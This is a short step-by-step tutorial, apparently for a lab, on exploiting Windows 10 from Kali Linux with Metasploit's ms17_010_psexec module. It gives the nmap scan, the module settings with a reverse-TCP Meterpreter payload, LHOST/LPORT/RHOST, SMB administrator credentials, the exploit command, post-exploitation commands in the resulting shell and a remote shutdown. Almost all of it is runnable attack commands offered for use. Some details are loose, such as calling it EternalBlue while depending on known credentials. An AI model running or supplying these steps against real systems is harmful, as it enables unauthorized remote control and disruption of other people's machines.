This document provides instructions for exploiting vulnerabilities in Windows 10, 8, and 7 using Kali Linux. It describes using the Metasploit framework to exploit the MS17-010 EternalBlue vulnerability via SMB to gain remote code execution on a Windows 10 system. The steps include scanning the target with Nmap, using Metasploit to configure the exploit with the correct payload, LHOST, LPORT, RHOST, and credentials, and executing the exploit to obtain a Meterpreter session and shell access on the target system.
Exploiting Windows10 8 7
How to exploit Windows 10 / 8 / 7 :-
1. Exploiting Windows 10 using ms17_010_psexec, Kali Linux 2018 :-
i. Victim machine Windows 10 IP address = 192.168.100.81
ii. Attacker machine Kali Linux IP address =

From the Kali Linux machine:-
i. nmap -sV -p 445 <windows 10 victim machine ip address>
ii. TCP port 445 is open on the Windows machine
iii. Kali Linux machine console :-

    root@kali~: msfconsole
    msf> search ms17_010_psexec
    msf> use exploit/windows/smb/ms17_010_psexec
    msf exploit(windows/smb/ms17_010_psexec) > info
    msf exploit(windows/smb/ms17_010_psexec) > options
    msf exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp
    msf exploit(windows/smb/ms17_010_psexec) > set LHOST <kali linux machine ip address>
    msf exploit(windows/smb/ms17_010_psexec) > set LPORT 4444
    msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.100.81 (windows victim machine ip)
    msf exploit(windows/smb/ms17_010_psexec) > set SMBUser pente

(In the line above, SMBUser pente is the administrator username of the Windows target machine. You can find this username by visiting the Windows machine and issuing a command like c:\users\pente> net user) …..

    msf exploit(windows/smb/ms17_010_psexec) > set SMBPass p3intest
    msf exploit(windows/smb/ms17_010_psexec) > options
    msf exploit(windows/smb/ms17_010_psexec) > exploit

If the exploit is successful, you will get a Meterpreter session:

    meterpreter > sysinfo
    meterpreter > shell

Issuing the shell command gives you a shell:

    C:\windows\system32> ipconfig
    C:\windows\system32> exit
    meterpreter > ps
    meterpreter > getuid
    meterpreter > getpid
    meterpreter > shell
    C:\windows\system32> shutdown -s -t 10 -c